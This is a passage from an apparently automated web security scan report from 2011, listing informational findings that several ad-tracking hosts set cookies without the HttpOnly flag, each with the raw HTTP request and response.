Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sun, 08-May-2016 21:35:00 GMT; path=/; domain=.mmismm.com
Content-Length: 62
Content-Type: text/javascript

var msegs='AG=1;AK=1;AM=1;AQ=1';Mindset.handleResponse(msegs);

11.104. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=AAU&si=18181&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:06 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:06 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:06 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:06 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955426^1304957226|18181^1304955426^1304957226; path=/; expires=Mon, 09-May-11 16:07:06 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

11.105. http://tags.bluekai.com/site/3775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3775

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3775 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bkst=KJh5Dn+v96WD7uvQZ1x/kAvyLcHC775Zy1/RRNx1/DjEvokk+QAAH5iLVwLayPIyWzPs6W/DhP5oTp5Rt9QV++bLEUY3ylkypo61rjAiInRZUtLjzG5TQLE5EgKU5JKEHbErAPGQ/4B1DmRe6VjH/1mte3pHB/C9Qa1HGhbQ7wG4dFpYzyUuO2GTaXM/3XOHOGcNpC+F39x3CCd7bcXqgNuaVbuIAJGkxk190TUDiiZCxYifkf+srj95u00kiPGtEDCZej49BjzvBmBQkkw8veLbzVqhY4WhT7kisTtezvKrT7VI65RgcEZGB77ExCpP3dlZSFZ7K/7KWdEmAUvo63pDVQNSijw+03qrhdFQuGBIrBqgo/w0rPcf3aDRG1h0gQtrRsqTKRj01D2/MiHNf8nuG5y5+9qC2yF0fd7HWQtQ7Jvv1Gf4uvZpDzM9mmkLsWaG7bXr6cLbdKdZU2oJqNL=; bk=uBEq2hA+ZqtVIHOf; bkc=KJh56paGANWxOdedub/huuDjavsSYO3E/WaGi9VqJqsEyIzih9ymDgJ6n2avCWQqiATsQGVYz2GsTC9HOhrSGmeQbY9/xStiQtYVk7u35NdpArdKXwchQf+f22b2ayTYqfTo4wJ2+Ou91wZNTULKMwlmelCbyWSMRf7QugeUnAkpFcSElsTeiDNt/XfmPvD8UM+0siCzDjC0IsX1yC0FlSmZUA6eNAcUzrBmiB60pwcS3yaQIa1CkwhQfT42t0+2Zpb7mPXfHwlKgxcjOIX+e2hr5+by+0G2z6SSbtkl0xWbplA0Nt47u2/zgXl8C5abf1GDWnZGzJwt5y/jtXUcWmjXfH5rTBWzLaErtF7LyxloUTjgL2nweUB2fuBSfNj5TD+p5Iyn2bPpNbu7T2/f1K7wDuwdvRH84KN7BvXOpqmIlba87fU2ppecS8d09UtSPfcjL4wjE6guazmzg8ti2facf0Vdw4alyh0FFDQKfikzeljGdLotf/46jzBUSj8mr8SkdxIkd0h/7pX7p4NGVlxKChbaqwYTwlR3YVcfFGfLGdKl7kjGqf65rhIP8FATp47SJXZ+kyoBCXrsbIZJ4UE452zCUa0HpkVAIKIL2pD3blBdE7BdtFXO6GR1X9==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:47 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=HEYMqHA+ZqtVIHOf; expires=Sat, 05-Nov-2011 15:35:47 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=...[SNIP]...; expires=Sat, 05-Nov-2011 15:35:47 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 15:35:47 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

11.106. http://tags.bluekai.com/site/3869

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3869

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3869 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bk=rWh9VOA+ZqtVIHOf; bkc=...[SNIP]...; bkst=KJh5Dn+v96WD7uvQZ1x/kAvyLcHC775Zy1/RRNx1/DjEvokk+QAAH5iLVwLayPIyWzPs6W/DhP5oTp5Rt9QV++bLEUY3ylkypo61rjAiInRZUtLjzG5TQLE5EgKU5JKEHbErAPGQ/4B1DmRe6VjH/1mte3pHB/C9Qa1HGhbQ7wG4dFpYzyUuO2GTaXM/3XOHOGcNpC+F39x3CCd7bcXqgNuaVbuIAJGkxk190TUDiiZCxYifkf+srj95u00kiPGtEDCZej49BjzvBmBQkkw8veLbzVqhY4WhT7kisTtezvKrT7VI65RgcEZGB77ExCpP3dlZSFZ7K/7KWdEmAUvo63pDVQNSijw+03qrhdFQuGBIrBqgo/w0rPcf3aDRG1h0gQtrRsqTKRj01D2/MiHNf8nuG5y5+9qC2yF0fd7HWQtQ7Jvv1Gf4uvZpDzM9mmkLsWaG7bXr6cLbdKdZU2oJqNL=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:40 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 15:35:40 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=uBEq2hA+ZqtVIHOf; expires=Sat, 05-Nov-2011 15:35:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56paGANWxOdedub/huuDjavsSYO3E/WaGi9VqJqsEyIzih9ymDgJ6n2avCWQqiATsQGVYz2GsTC9HOhrSGmeQbY9/xStiQtYVk7u35NdpArdKXwchQf+f22b2ayTYqfTo4wJ2+Ou91wZNTULKMwlmelCbyWSMRf7QugeUnAkpFcSElsTeiDNt/XfmPvD8UM+0siCzDjC0IsX1yC0FlSmZUA6eNAcUzrBmiB60pwcS3yaQIa1CkwhQfT42t0+2Zpb7mPXfHwlKgxcjOIX+e2hr5+by+0G2z6SSbtkl0xWbplA0Nt47u2/zgXl8C5abf1GDWnZGzJwt5y/jtXUcWmjXfH5rTBWzLaErtF7LyxloUTjgL2nweUB2fuBSfNj5TD+p5Iyn2bPpNbu7T2/f1K7wDuwdvRH84KN7BvXOpqmIlba87fU2ppecS8d09UtSPfcjL4wjE6guazmzg8ti2facf0Vdw4alyh0FFDQKfikzeljGdLotf/46jzBUSj8mr8SkdxIkd0h/7pX7p4NGVlxKChbaqwYTwlR3YVcfFGfLGdKl7kjGqf65rhIP8FATp47SJXZ+kyoBCXrsbIZJ4UE452zCUa0HpkVAIKIL2pD3blBdE7BdtFXO6GR1X9==; expires=Sat, 05-Nov-2011 15:35:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 15:35:40 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

11.107. http://trc.taboolasyndication.com/usatoday/log/2/visible

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/visible

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usatoday/log/2/visible?ri=21db8aab092294661c05925509bb8015&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415&ui=d80f7856-eeab-487a-988c-f15ce2ff8eb0&pi=46732364&pt=text&li=rbox-t2v&il=4158710290402832976%2C1510865350917446228&id=3432&url=http%3A//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:36:58 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://cdn.taboolasyndication.com/pixel.gif
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Set-Cookie: taboola_rii=4158710290402832976_1510865350917446228;Path=/usatoday/;Expires=Tue, 08-May-12 15:36:58 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8


11.108. http://trgc.opt.fimserve.com/fp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgc.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=738-002553&rnd=555853643077 HTTP/1.1
Host: trgc.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:19 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

11.109. http://trgca.opt.fimserve.com/fp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgca.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12 HTTP/1.1
Host: trgca.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

11.110. http://va.px.invitemedia.com/adnxs_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /adnxs_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=113105&message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG48plFgEni6YQF71gUGDUWTgTSBowWYD6XDMeFD0xA2cdgWSaNO5uXAmWZLO5AZb9/YxZglPj/bD5Y7//jC8F6wXyg7OwbINnnUNn2+RCTwXwuEY6VZ1mBsp3f24CyDBoMBgwWDEDRewdYgfZtufDrLbLoK7Abny36gSK6Yj7IhMl9p1FEd94H2Tpr/lqEKAB9a00/"; io_freq_p1="eJzjkuY4HijAIvF0woJ3LAqMGgsnAmkDRgswn0ucY7e1AJPEY7AkgwaDAZPFHajEAhegxP9n8+ESz0FsLmGOqxECjBKd39ugEgwWDEDB9a5A1Vsu/HqLLLgtFKhyct9pFMG9LkDBWfPXIgQB0Zcv8g=="; 
partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:37:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 15:36:52 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1304955432+ \"5056308203649640923\"+ 4451+ 6017+ 2]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuFYeZZVgElixZQF71gUGDVetCx8x2LAaAHmc0lwXPnMApR9OgEky6DBAJQBs7lkOC58YALKPAbLMGnc2bwUqI/J4g5U9vs3ZgFGif/P5oNN/X8cYiqYD5SdfQMk+xwq2z5/AVgWzOcS4bh3AOSiLRd+vYXYyWDBABR9BXbJs0U/UERXzGcFmjS57zSK6M77IPNnzV+LEAUAeCtQJA=="; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
